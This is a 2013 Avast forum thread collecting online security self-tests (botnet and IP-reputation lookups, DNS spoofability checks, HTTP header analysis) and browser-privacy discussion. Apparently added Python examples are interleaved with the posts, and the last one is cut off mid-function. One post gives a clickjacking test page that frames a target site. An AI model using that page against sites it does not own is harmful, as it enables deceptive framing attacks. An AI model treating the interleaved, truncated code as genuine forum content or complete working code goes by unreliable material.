Avast WEBforum

Other => General Topics => Topic started by: polonus on July 05, 2013, 11:15:25 PM

Title: Tests and other Media topics
Post by: polonus on July 05, 2013, 11:15:25 PM
Test if your IP address does not form part of Pobelka botnet: http://check.botnet.nu/infected.php
Check your IP for botnet-blacklists: http://www.robtex.com/ip/xxx.xxx.xxx.xxx.html#blacklists
Check also here: https://forms.fbi.gov/check-to-see-if-your-computer-is-using-rogue-DNS

polonus
Title: Re: Do another test...
Post by: wyrmrider on July 06, 2013, 03:49:59 AM
Note that the third link (to the FBI) asks for your IP address, which is conveniently provided by the first link.
cheers
Title: Re: Tests and other Media Topics
Post by: polonus on July 07, 2013, 07:51:40 PM
Test whether your DNS is good: http://www.provos.org/dns_test.js?site=yoursite
and then go here: http://www.provos.org/index.php?/archives/42-DNS-and-Randomness.html

polonus
Title: Re: Tests and other Media Topics
Post by: polonus on July 10, 2013, 09:21:04 PM
A test for X-Frame-options (clickjacking) -> http://int21.de/frametest/  (courtesy/credits to Hanno Böck)
No red boxes on the left for me, all green!

polonus
Title: Re: Tests and other Media Topics
Post by: polonus on July 10, 2013, 09:41:19 PM
Not for the client side, but if you wanna scan a website, see this one, which comes with a clickjacking warning: https://asafaweb.com/Scan?Url=www.ad.nl
vulnerable to clickjacking, plus a cookie warning (brought to us by AppHarbor, making use of simple HTTP requests... no pentesting whatsoever...)

enjoy,

polonus
Title: Re: Tests and other Media Topics
Post by: polonus on July 16, 2013, 12:08:08 AM
Not a test but another topic of interest...

See: http://techblog.netflix.com/2013/06/html5-video-in-ie-11-on-windows-81.html
FSF is against: https://www.fsf.org/blogs/community/cancel-netflix-if-you-value-freedom
Should DRM come to HTML5, will other browser makers be urged to follow these standards?
Netflix, Google and Microsoft are pro DRM in HTML5.
Will this mean the end of the open web we know today?
The proposal: https://dvcs.w3.org/hg/html-media/raw-file/tip/encrypted-media/encrypted-media.html

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on July 16, 2013, 12:53:46 AM
It means not needing to depend on Flash any more which has more holes than swiss cheese.
It means they'll now need to find the insecurities in HTML5. I'm sure it will not take long.  :'(
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2013, 01:04:32 PM
Hi bob3160,

That is already happening while you start to discuss this: http://deadliestwebattacks.com/2012/05/25/html5-unbound-part-2-of-4/ (link author = Mike)
With the new features come new insecurities, and again the culprit is spelled JS, right, JavaScript. For an example see here: http://stackoverflow.com/questions/12480892/framebuffer-html5-canvas-audio-api-insecure-operation-error -> audio and web page must be same-origin,
so you'd have to go to about:config in Firefox and disable security.fileuri.strict_origin_policy (credits David Humphrey).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2013, 06:02:23 PM
So test how your browser performs in the HTML5 test: http://html5test.com/index.html
Google Chrome has issues with Microdata. 459 points + 13 bonus points for me...
A non-html5 browser would score 78 points, but will render web applications.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2013, 07:35:55 PM
See: http://www.appremover.com/
downloadable free version http://www.appremover.com/download
AppRemover enables you to thoroughly uninstall many antivirus and antispyware products from your computer. It removes traces that are often left behind by the standard uninstaller, including registry keys, folders and files. AppRemover offers support for many popular antivirus/antispyware products.
Is it better than RevoUninstaller? Can it be used on an emergency USB?

Damian
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2013, 08:16:10 PM
Insecure Spy Extension amazon-1-button!

Read: http://blog.kotowicz.net/2013/07/jealous-of-prism-use-amazon-1-button.html
1-button extension in Chrome Amazon to listen in on all encrypted SSL traffic... and they still are...
link article author = @kkotowicz
This story was confirmed here: http://www.heise.de/newsticker/meldung/Amazons-Einkaufshilfe-spioniert-Nutzer-aus-1916578.html
translate using Google Translate...

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on July 16, 2013, 11:47:54 PM
So test how your browser performs in the HTML5 test: http://html5test.com/index.html
Google Chrome has issues with Microdata. 459 points + 13 bonus points for me...
A non-html5 browser would score 78 points, but will render web applications.

polonus
Also using Chrome:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1374011219028-34387.png)
Title: Re: Tests and other Media topics
Post by: bob3160 on July 16, 2013, 11:51:03 PM
See: http://www.appremover.com/
downloadable free version http://www.appremover.com/download
AppRemover enables you to thoroughly uninstall many antivirus and antispyware products from your computer. It removes traces that are often left behind by the standard uninstaller, including registry keys, folders and files. AppRemover offers support for many popular antivirus/antispyware products.
Is it better than RevoUninstaller? Can it be used on an emergency USB?

Damian
Have you already forgotten ???
http://forum.avast.com/index.php?topic=102237.msg851908#msg851908

Title: Re: Tests and other Media topics
Post by: polonus on July 17, 2013, 12:00:58 AM
Hi bob3160,

Credits go where they should.
You win. No Competition.  ;D
I just have to check the browser test results for Chrome on my new Win8 machine.  :P
The test was done on Vista.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on July 18, 2013, 06:21:53 PM
Only for advanced users that know what they do!

Users with firefox that wanna go on without Java,
will find that Oracle will not uninstall everything Firefox-related and leaves debris behind.
Whenever everything in combination with Java has been uninstalled,
just open up regedit, go to key HKEY_LOCAL_MACHINE\Software\MozillaPlugins
delete all subkeys there starting with @java.com.
Also delete the subkey HKEY_CLASSES_ROOT\CLSID\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}.
Moreover also delete file: C:\WINDOWS\system32\npDeployJava1.dll.
Before doing this make a copy of your registry in case anything goes wrong,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 19, 2013, 02:20:18 PM
Marketeers want Firefox to block ad-blockers: http://www.iab.net/iablog/2013/07/has-mozilla-lost-its-values.html
Profiling can still be done, but using third party cookies made this quite easy for ad-launchers.

By the way: tracking protection in IE9 and IE 10 could also be done, use
\ EasyPrivacy (tracking protection)
\ EasyList Standard (adblock) and/or Dutch etc. EasyList (adblock)

The reason we do not want ad-blockers to leave our browsers, is that adblockers also protect us from malicious cybercriminal marketeers.
The method adfree has already been blocked in the Google Play market, because most ads do not come locally but from big sites.

polonus
Title: Re: Tests and other Media topics
Post by: MAG on July 19, 2013, 02:42:56 PM
I only returned to IE in Windows after I discovered how to use tracking protection to block ads.

If firefox disables adblocking I will find a different linux browser (if I can't find a workaround).
Title: Re: Tests and other Media topics
Post by: polonus on July 20, 2013, 02:30:40 PM
Another botnet IP check. Are you in a database? https://www.check-and-secure.com/ipcheck/_en/solution/clean.php
Good I am not, and also here on Webbot/Spider check: http://bot.myip.ms/

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on July 20, 2013, 05:43:44 PM
Another botnet IP check. Are you in a database? https://www.check-and-secure.com/ipcheck/_en/solution/clean.php
Good I am not, and also here on Webbot/Spider check: http://bot.myip.ms/

polonus
Neither am I. :)
Title: Re: Tests and other Media topics
Post by: polonus on July 20, 2013, 11:41:48 PM
Like the online tests from Steve Gibson.

Do this DNS Nameserver Spoofability Test here: https://www.grc.com/dns/dns.htm

I have two different nameservers, that is good,
and my results were "excellent".

For best results, you should have all green in-
External ping should be not/less visible,
External query should be ignored,
DNSSEC Security should be supported,
Alphabetic Case should be mixed,
Extra Anti-spoofing should be present.

What were your results?

polonus
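Two of the items on the checklist above (the ones behind "Extra Anti-spoofing" and "Alphabetic Case") can be judged offline from a resolver's outbound queries: whether source ports and transaction IDs are unpredictable, and whether the question name uses randomised 0x20 mixed case. The following is an added example, not GRC's test code; the "good" and "bad" resolvers are constructed with a seeded PRNG, and the function names (`assess_resolver`, `constructed_samples`) and thresholds are choices made here. DNSSEC support and the external ping/query items need live probes and are not covered.

```python
"""Assess resolver spoofability from a sample of its outbound queries.

Added example (not GRC's code). Each sample is one query seen leaving the
resolver: its UDP source port, DNS transaction ID and question name.
"""
import math
import random
from collections import Counter


def shannon_bits(values):
    """Shannon entropy, in bits, of the observed value distribution."""
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in Counter(values).values())


def sequential_fraction(values):
    """Fraction of consecutive samples that differ by exactly 1 (mod 2^16).

    High entropy alone does not prove randomness: a counter is all-distinct
    but fully predictable, which is what this catches.
    """
    if len(values) < 2:
        return 0.0
    steps = sum(1 for a, b in zip(values, values[1:]) if (b - a) % 65536 == 1)
    return steps / (len(values) - 1)


def has_mixed_case(qname):
    """0x20 encoding: letters of the question name appear in both cases."""
    letters = [ch for ch in qname if ch.isalpha()]
    return any(ch.islower() for ch in letters) and any(ch.isupper() for ch in letters)


def assess_resolver(samples, min_bits=8.0, max_sequential=0.1, min_case_ratio=0.9):
    """Return per-property scores and an overall verdict for the samples."""
    ports = [s["src_port"] for s in samples]
    txids = [s["txid"] for s in samples]
    report = {
        "port_bits": shannon_bits(ports),
        "txid_bits": shannon_bits(txids),
        "txid_sequential": sequential_fraction(txids),
        "mixed_case_ratio": sum(has_mixed_case(s["qname"]) for s in samples) / len(samples),
    }
    report["port_random"] = report["port_bits"] >= min_bits
    report["txid_random"] = (report["txid_bits"] >= min_bits
                             and report["txid_sequential"] <= max_sequential)
    report["case_random"] = report["mixed_case_ratio"] >= min_case_ratio
    all_good = report["port_random"] and report["txid_random"] and report["case_random"]
    report["verdict"] = "excellent" if all_good else "bad"
    return report


def constructed_samples(kind, n=1000, seed=1):
    """Constructed traffic: 'good' randomises everything, 'bad' uses a fixed
    port, a counter for the transaction ID and a plain lower-case name."""
    rng = random.Random(seed)
    name = "www.example.test"
    out = []
    for i in range(n):
        if kind == "good":
            out.append({
                "src_port": rng.randint(1024, 65535),
                "txid": rng.randint(0, 65535),
                "qname": "".join(ch.upper() if rng.random() < 0.5 else ch for ch in name),
            })
        else:
            out.append({"src_port": 53, "txid": (1000 + i) % 65536, "qname": name})
    return out


if __name__ == "__main__":
    for kind in ("good", "bad"):
        print(kind, assess_resolver(constructed_samples(kind)))
```

With the constructed input the "bad" resolver fails on two separate grounds: its port entropy is zero, and its transaction IDs, although all distinct and therefore high-entropy, are a counter, which `sequential_fraction` reports as 1.0.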
Title: Re: Tests and other Media topics
Post by: polonus on July 21, 2013, 12:19:27 AM
Another test to perform is a router crash test.
Hurrah, my router survived,
but my MalwareBytes Anti-Exploit Shield crashed on the test
and had to be closed. Well I have put that beta version up again.
For the test go here: https://www.grc.com/dns/crashtest.htm
And again, nice test from Steve Gibson.
Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 21, 2013, 07:42:45 PM
What HTTP server is that site running, online scan: http://andrew.hedges.name/experiments/what-server/

polonus

P.S. more from this site:  http://andrew.hedges.name/experiments/

This one is strange by andrew hedges: http://andrew.hedges.name/experiments/whatevernator/#31

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 25, 2013, 11:36:29 PM
Just look at the latest sandbox comparison test, Google and Adobe sandboxes more secure than Sandboxie.
Some tools were not considered like for instance Anubis iseclab, example: http://anubis.iseclab.org/?action=result&task_id=1976684dda45722241551da96229482f6
The Bromium Test results here: http://labs.bromium.com/2013/07/23/application-sandboxes-a-pen-testers-perspective/
Well you always have to consider the weaknesses of a sandbox.
Save something and you are seen.
Condensed files won't run.
No driver access permitted.
So sandboxes for malware analysis certainly come with specific limitations.
Not clear what is the position of the avast sandbox here? 

Anyone to comment?

polonus
Title: Re: Tests and other Media topics
Post by: JuninhoSlo on July 27, 2013, 05:03:07 PM
Like the online tests from Steve Gibson.

Do this DNS Nameserver Spoofability Test here: https://www.grc.com/dns/dns.htm

I have two different nameservers that is good,
and my results were "excellent"

For best results, you should have all green in-
External ping should be not/less visible,
External query should be ignored,
DNSSEC Security should be supported,
Alphabetic Case should be mixed,
Extra Anti-spoofing should be present.

What were your results?

polonus

I ran Steve Gibson's DNS Nameserver Spoofability Test and my results were "Bad", and I also have 2 different nameservers, just like you, Polonus.

Title: Re: Tests and other Media topics
Post by: MAG on July 28, 2013, 12:24:22 PM
Just look at the latest sandbox comparison test, Google and Adobe sandboxes more secure than Sandboxie.
Some tools were not considered like for instance Anubis iseclab, example: http://anubis.iseclab.org/?action=result&task_id=1976684dda45722241551da96229482f6
The Bromium Test results here: http://labs.bromium.com/2013/07/23/application-sandboxes-a-pen-testers-perspective/
Well you always have to consider the weaknesses of a sandbox.
Save something and you are seen.
Condensed files won't run.
No driver access permitted.
So sandboxes for malware analysis certainly come with specific limitations.
Not clear what is the position of the avast sandbox here? 

Anyone to comment?

polonus

Would have been interested to hear what they thought of the Linux Chromium sandbox set-up with seccomp sandbox (plus Mandatory Access Control enforced by Apparmor or SELinux).
Title: Re: Tests and other Media topics
Post by: polonus on July 28, 2013, 01:09:33 PM
You could also perform a test here: http://www.dnssy.com/report.php?q=
I got: Hostname looks good. Found 8 parent nameservers. Glue from root nameservers to parent nameservers is missing. This means that an extra lookup is required to find your parent nameservers. There is nothing you can do about this. No nameservers found at parent nameserver, as I have no domain nor website.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 28, 2013, 03:12:14 PM
Performing an IP Reputation Scan.

I tested here for my IP Reputation: http://ipremoval.sms.symantec.com/lookup/#
result: "does not have a negative reputation and therefore cannot be submitted for investigation."
And not blacklisted here: http://www.ipvoid.com/scan/
Check also here: http://labs.alienvault.com/own_ip_reputation.php -> IP not found
Also check here against honeypot resources: https://www.projecthoneypot.org/ip_
and here: http://www.botsvsbrowsers.com/ip/your ip/index.html
and here: http://www.linuxmagic.com/products/bms/lookup
O.K. Do not forget to check IP here: http://www.senderbase.org/lookup?search_string=your IP
and here: https://support.proofpoint.com/rbl-lookup.cgi?ip=your IP
result: "Your IP address is not currently being blocked nor delayed...."

D
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2013, 10:03:37 AM
Check the health of the DNS of your domain here: http://dnscheck.pingdom.com/?domain=avast.com
This check is part of a couple of characteristic-tests that will set out malicious URLs.
We may look for:

DNS anomalies, open resolvers (check against the urlquery dot net scanner):
1 Resolved IP count (Integer)
2 Name server count (Integer)
3 Name server IP count (Integer)
4 Malicious ASN ratio of resolved IPs (Real)
5 Malicious ASN ratio of name server IPs (Real)

DNS fluxiness features

URL token/path characteristics (delimited by '.', '/', '?', '=', '-', ' '), check with Firekeeper and IDS:
1 Domain token count
2 Path token count
3 Average domain token length (Real)
4 Average path token length (Real)
5 Longest domain token length
6 Longest path token length
7-9 Spam, phishing and malware SLD hit ratio (Real)
10 Brand name presence (Binary)

Web content characteristics, etc. Check against: http://scanurl.net/?u='+encodeURIComponent(location.href)+'&k#results');})();
Backlinks and link popularity etc. -> http://smallseotools.com/backlink-checker/ etc.

Info from Hyunsang Choi, Detecting Malicious Web Links etc.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2013, 03:03:21 PM
Some tools to help you here: http://www.webtoolhub.com/tools.aspx
Online security tools -> example: http://evuln.com/labs/cooptraiss.com/
and example like:
http://www.iwebtool.com/google_banned?domain=www.toolshack.com
http://www.iwebtool.com/code_viewer?domain=www.toolshack.com  (10 requests allowed per hour)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 09, 2013, 09:49:46 PM
Also check here for domain info: http://sitesentral.com/www.avast.com (last updated June 8, 2013)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 21, 2013, 05:25:20 PM
Did firefox developers give in to advertisers (and malvertisers) taking some features out of the browser,
read: http://stopmalvertising.com/security/changes-in-firefox-23-get-the-disabled-options-back.html
Can be adjusted back to previous default settings via this extension: https://addons.mozilla.org/en-us/firefox/addon/settingsanity/
Is firefox also going to be an ad-launching browser rather than a browser taken out of the hands of the general user that likes to tweak it and use script-blocking and ad-blocking?

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 21, 2013, 05:36:30 PM
Could it be that Firefox wants to survive financially ???
Title: Re: Tests and other Media topics
Post by: polonus on August 21, 2013, 06:01:55 PM
Hi bob3160,

As long as I can work ABP together with NoScript and RequestPolicy in the browser I feel secure. A lot of the "a la default users" won't work a browser to their personal settings (secure) or do not know how to do this or find it "a drag". I have no problem with the "poor" adscript developers to earn an honest slice of bread and butter (even a piece of cake once in a while), but I do not want malvertisers and malcreants (SEO click fraud malsite redirectors) to be able to play their foul games because the browser went advertiser friendly by default now.
That is why I rather use Chrome now with additional extensions over fx or use my personal flaw of an updated version of flock socio-browser (left by developers and therefore more secure with NS and RP installed and essential code added)...
Also read: http://limi.net/checkboxes-that-kill  link article author = Alex Limi

Damian
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2013, 10:31:22 PM
Is this firefox extension a good idea or not? https://addons.mozilla.org/en-us/firefox/addon/http-nowhere/
This is to block unencrypted web traffic for added security.
Or is it just as with https everywhere that the avast shields may not scan this unencrypted traffic and therefore the use of it is not advisable?

Anyone to comment?

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 27, 2013, 10:39:17 PM
Is this firefox extension a good idea or not? https://addons.mozilla.org/en-us/firefox/addon/http-nowhere/
This is to block unencrypted web traffic for added security.
Or is it just as with https everywhere that the avast shields may not scan this unencrypted traffic and therefore the use of it is not advisable?

Anyone to comment?

polonus
So you're supposed to create a whitelist of acceptable unencrypted sites ??? Enjoy, not something I intend to slow my system down with.
avast! already checks all these "unencrypted" sites so why add a man in the middle to make life more complicated. ???
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2013, 10:44:47 PM
Hi bob3160,

Thanks for your comment. I hope DavidR could come up with some similar opinion of this extension and why he would not use it.

Damian
Title: Re: Tests and other Media topics
Post by: !Donovan on August 27, 2013, 11:45:36 PM
Hi Polonus,

I believe that websites shouldn't be "blocked" due to the use of http, even if part https.

~!Donovan
Title: Re: Tests and other Media topics
Post by: DavidR on August 28, 2013, 12:01:06 AM
Hi bob3160,

Thanks for your comment. I hope DavidR could come up with some similar opinion of this extension and why he would not use it.

Damian

This could be a real pain in the backside blocking http content unless you specifically allow it. So it is forcing the user down the https route, by whatever means (probably having to use http everywhere) otherwise the user would be blocked from lots of sites, a pain.

I don't know if this may also give the user lots of mixed content errors seen many times in these forums.

I don't think that forcing https (or blocking http) makes you any safer, so it means your traffic is encrypted, but that doesn't mean safer. You all know my feelings about that as currently it means that the web shield can't protect you. Just because a connection is https doesn't mean you can't get infected, just the reverse as you lose some of the avast protection.

####
Now I know avast are looking at ways to be able to have https traffic scanned, not just http. When this comes to fruition, then forcing https isn't such an issue.

But even then this add-on would be a pain in the backside, a little like some feel about NoScript but much more severe as it would be blocking http, crazy.
Title: Re: Tests and other Media topics
Post by: polonus on August 28, 2013, 10:01:43 AM
Hi DavidR,

Agree with you and bob3160 here, https only or http nowhere are inferior solutions as we compare this to the combination of the no script and request policy extension, where we still have the complete avast! Shields protection against http malcoded content ((obfuscated) malscripts, malicious iFrames and various malicious redirects, backlinks to drive-by-malware). Additionally users have google safebrowsing, pre-scanning guidance, so in order to get infested you have to ignore warnings and this could be qualified as "unwise" user intervention. Https only and http nowhere extensions never helped against the PEBKAC problem as the main cause of malcode getting onto computers and peripherals,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 28, 2013, 10:58:04 AM
For instance this extension may not protect against mouse snooping here: http://www.ispreview.co.uk/index.php/2013/08/isp-sky-broadband-uk-says-no-need-to-worry-about-sessioncam-snooping.html
Anyway NoScript was able to detect and eventually stop/block this alleged privacy invasion. (SessionCam, ClickTale used by British providers to analyze user interaction with/on certain websites)

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 28, 2013, 01:26:31 PM
For instance this extension may not protect against mouse snooping here: http://www.ispreview.co.uk/index.php/2013/08/isp-sky-broadband-uk-says-no-need-to-worry-about-sessioncam-snooping.html
Anyway NoScript was able to detect and eventually stop/block this alleged privacy invasion. (SessionCam, ClickTale used by British providers to analyze user interaction with/on certain websites)

polonus
In order for NoScript to help, you first need to know how to use it and, you need to know when not to bypass it.
Something most users don't know and therefore, NoScript is a great tool for the knowledgeable user but most novices,
simply hit the allow button.  :(
Title: Re: Tests and other Media topics
Post by: DavidR on August 28, 2013, 01:46:13 PM
There are many things that require some user knowledge, but some would say they have to have some knowledge to even find out about these tools/add-ons to start with.

NoScript isn't that complex, the complexity comes on sites that have a myriad of content from 3rd party sites. But like everything else in life you have to put in some effort to get results.
Title: Re: Tests and other Media topics
Post by: bob3160 on August 28, 2013, 02:42:47 PM
There are many things that require some user knowledge, but some would say they have to have some knowledge to even find out about these tools/add-ons to start with.

NoScript isn't that complex, the complexity comes on sites that have a myriad of content from 3rd party sites. But like everything else in life you have to put in some effort to get results.
The one good thing is that you're blocked from an immediate infection if NoScript is active. The remainder is up to you, your other protection and some luck. :)
Title: Re: Tests and other Media topics
Post by: polonus on August 28, 2013, 05:46:48 PM
Hi bob3160,

Main site links aren't mostly the problem or the site must be malicious by intent. In most cases it is unchecked injected content or redirecting external (third party) links and iFrames that will abuse the vulnerable computer. As you said google safebrowsing and others already block the main bulk of known malicious links. I think the users which have all the avast shields up and running and also checked their software through the avast software updater will become rare victims and then only if they venture out where dangers are lurking (pr0n, hacks, cracks, pirated and illegal content), so going to the Interweb's back alley where cybercriminal and friends are known to be active. A grain of common security sense will protect you better against malware infections than ten tons of protection, at least that is known to us by experience,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 29, 2013, 10:21:47 PM
Interesting real-time data to identify the global regions with the greatest attack traffic
-> http://www.akamai.com/html/technology/dataviz1.html  (source akamai technologies)
also available as app: https://itunes.apple.com/app/akamai-internet-visualization/id502695146?mt=8

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 01, 2013, 10:08:33 PM
Try the final version of ABP for IE: Adblock Plus for Internet Explorer page:

https://adblockplus.org/nl/internet-explorer
https://adblockplus.org/en/internet-explorer

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2013, 12:02:26 PM
Test your site against clickjacking.
One way to do this is test at ASafaWeb Scanner: https://asafaweb.com/Scan?Url=www etc.
Another way to pentest on your own website is make an HTML page with this code:
<html>
  <head>
    <title>Clickjack test page</title>
  </head>
  <body>
    <p>You’ve been clickjacked!</p>
    <!-- replace yoursite with your site's main URL; if the framed page renders here,
         the site sends no framing protection (X-Frame-Options or CSP frame-ancestors) -->
    <iframe sandbox="allow-scripts allow-forms" src="http://yoursite:8080" style="width:100%;height:90%"></iframe>
  </body>
</html>
Code credits go to ITSecurity's Lakshmi Prudhvi. * yoursite = main URL of site, e.g. www dot mysite dot com
Whenever vulnerable, opened in the browser you see: "You have been clickjacked!"

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2013, 11:53:04 PM
Public Malware Database: http://owl.nchc.org.tw/km/

pol
Title: Re: Tests and other Media topics
Post by: polonus on September 08, 2013, 10:40:47 PM
Does a https site use PFS?
Check with the Netcraft extension for Google Chrome and firefox.
Read: http://toolbar.netcraft.com/help/faq/index.html#pfs
PFS makes https more secure against surveillance,
even if the private key of the website has been cracked:
with PFS every session has to be cracked separately,
for instance in national security agency surveillance.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 13, 2013, 09:13:34 PM
Free malware scan as a service from this University on Saturday 9-14-2013 ->
http://www.ky3.com/news/ky3-free-computer-virus-scan-saturday-at-sbu-20130912,0,1341868.story
Free computer virus scan Saturday at SBU 'Disinfection Day'

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 21, 2013, 12:48:53 PM
Test that https page for insecure content here: http://www.whynopadlock.com/check.php
Another check I did with this extension in Google Chrome: RECX HTTP Header and Cookie Security Analyzer
from Recx Ltd - www.recx.co.uk
results:
Analysis results for: https://www.security.nl/

HTTP security headers (Name: Value -> Setting secure / Secure connection)
x-frame-options: deny -> OK - follows best practice / OK - follows best practice
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 -> OK - follows best practice / OK - follows best practice
strict-transport-security: max-age=31536000 -> OK - follows best practice / OK - follows best practice
x-content-type-options: N/A -> Investigate - does not follow best practice / OK - follows best practice
x-xss-protection: N/A -> Investigate - does not follow best practice / OK - follows best practice
x-content-security-policy: N/A -> Investigate - does not follow best practice / OK - follows best practice
access-control-allow-origin: N/A -> OK - follows best practice / OK - follows best practice

Cookie information (1 cookie)
Name   Domain   Secure attribute   HTTP only attribute   Host only attribute   Secure connection
sessionid   .www.security.nl
Information - no risk or does not apply
OK - follows best practice

Page meta security headers: (table empty)

polonus
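The verdicts in the RECX report above, and the X-Frame-Options check behind the clickjacking test page earlier in this thread, come down to a handful of rules over the response headers and the Set-Cookie line. The following is an added example, not the extension's code or anything from the forum: `check_security_headers` and `check_cookies` are names chosen here, and the sample headers and cookie are constructed to mirror the security.nl result (the cookie's attributes are guessed as absent, since the report left them blank).

```python
"""Check a response's security headers and cookies the way the RECX analyser
reports them, including the framing check behind the clickjacking test page.

Added example (not the extension's code). SAMPLE_HEADERS and
SAMPLE_SET_COOKIES are constructed to mirror the quoted security.nl result.
"""
from http.cookies import SimpleCookie

OK = "OK - follows best practice"
INVESTIGATE = "Investigate - does not follow best practice"

# Constructed input: what a server might send, as header-name -> value.
SAMPLE_HEADERS = {
    "X-Frame-Options": "deny",
    "Cache-Control": "no-store, no-cache, must-revalidate, post-check=0, pre-check=0",
    "Strict-Transport-Security": "max-age=31536000",
}
SAMPLE_SET_COOKIES = ["sessionid=abc123; Path=/; Domain=.www.security.nl"]


def hsts_max_age(value):
    """Parse max-age out of a Strict-Transport-Security value; 0 if absent or invalid."""
    for part in value.split(";"):
        part = part.strip().lower()
        if part.startswith("max-age="):
            try:
                return int(part.split("=", 1)[1])
            except ValueError:
                return 0
    return 0


def check_security_headers(headers):
    """Return {header-name: verdict} for the headers the RECX report lists."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    # The 2013 report used the prefixed name; the standard name is checked first.
    csp = h.get("content-security-policy", h.get("x-content-security-policy", "")).lower()
    xfo = h.get("x-frame-options", "").lower()
    return {
        # Clickjacking: DENY/SAMEORIGIN, or a CSP frame-ancestors directive, stops framing
        "x-frame-options": OK if xfo in ("deny", "sameorigin") or "frame-ancestors" in csp else INVESTIGATE,
        # no-store keeps authenticated responses out of shared caches
        "cache-control": OK if "no-store" in h.get("cache-control", "").lower() else INVESTIGATE,
        # HSTS with at least a one-year max-age (31536000 s), as in the quoted result
        "strict-transport-security": OK if hsts_max_age(h.get("strict-transport-security", "")) >= 31536000 else INVESTIGATE,
        # nosniff stops browsers guessing a content type for scripts and styles
        "x-content-type-options": OK if h.get("x-content-type-options", "").lower() == "nosniff" else INVESTIGATE,
        # The 2013 tool flagged a missing X-XSS-Protection; current browsers ignore this header
        "x-xss-protection": OK if h.get("x-xss-protection", "").startswith("1") else INVESTIGATE,
        "content-security-policy": OK if csp else INVESTIGATE,
        # A wildcard origin lets any site read the response; absent or a specific origin is fine
        "access-control-allow-origin": INVESTIGATE if h.get("access-control-allow-origin", "") == "*" else OK,
    }


def check_cookies(set_cookie_headers, https=True):
    """Return per-cookie attribute flags and a verdict for each Set-Cookie line."""
    results = {}
    for raw in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(raw)
        for name, morsel in jar.items():
            secure = bool(morsel["secure"])
            httponly = bool(morsel["httponly"])
            host_only = not morsel["domain"]  # no Domain attribute: not shared with subdomains
            # On https a session cookie should carry both Secure and HttpOnly
            verdict = OK if httponly and (secure or not https) else INVESTIGATE
            results[name] = {"secure": secure, "httponly": httponly,
                             "host_only": host_only, "verdict": verdict}
    return results


if __name__ == "__main__":
    for name, verdict in check_security_headers(SAMPLE_HEADERS).items():
        print(f"{name:28} {verdict}")
    for name, info in check_cookies(SAMPLE_SET_COOKIES).items():
        print(name, info)
```

Run against the constructed sample it reproduces the quoted report: the three headers the site sent pass, the absent ones are flagged, and the session cookie is flagged because it carries neither Secure nor HttpOnly.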
Title: Re: Tests and other Media topics
Post by: bob3160 on September 21, 2013, 01:54:51 PM
Nice addition. Thanks :)
Title: Re: Tests and other Media topics
Post by: polonus on September 22, 2013, 11:19:55 PM
Wanna know where redirects go?

Good online check: http://www.internetofficer.com/seo-tool/redirect-check/
For the site here:
Response
Checked link: http://forum.avast.com/index.php
Type of link: direct link

Another example:
Response
Checked link: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html.
Type of redirect: 300 Multiple Choices  *
Redirected to: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html.

This is explained here: http://www.checkupdown.com/status/E300.html  (info link from Pitdale)

polonus
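What the redirect-check tool above does is follow Location headers one hop at a time and report the chain, and the second example shows why a checker has to watch for a hop that points back at itself. The following is an added example, not the tool's code: `follow_redirects` walks a chain with loop and hop-count protection and flags the two things worth noticing on a chain (a change of host and an https-to-http downgrade). `FAKE_RESPONSES` is a constructed stand-in for a live server so the block runs offline; `live_fetch` is the optional real fetcher, built on urllib without automatic redirect following.

```python
"""Follow an HTTP redirect chain hop by hop and summarise it.

Added example (not the redirect-check tool's code). FAKE_RESPONSES is a
constructed server: url -> (status code, Location header or None).
"""
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

FAKE_RESPONSES = {
    "http://forum.example.test/index.php": (200, None),
    "http://example.test/old": (301, "/new"),                      # relative Location
    "http://example.test/new": (302, "https://example.test/new"),  # upgrade to https
    "https://example.test/new": (200, None),
    "http://example.test/out": (302, "http://ads.example.net/landing"),
    "http://ads.example.net/landing": (200, None),
    "https://example.test/secure": (301, "http://example.test/plain"),  # downgrade
    "http://example.test/plain": (200, None),
    "http://example.test/choices": (300, "http://example.test/choices"),  # points at itself
}


def fake_fetch(url):
    """Offline stand-in for an HTTP request."""
    return FAKE_RESPONSES.get(url, (404, None))


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # make urllib raise instead of following


def live_fetch(url):
    """Real fetcher: one request, no automatic redirect following."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=10) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")


def _summary(start, hops, final, status, kind):
    chain = [start] + [target for _, _, target in hops]
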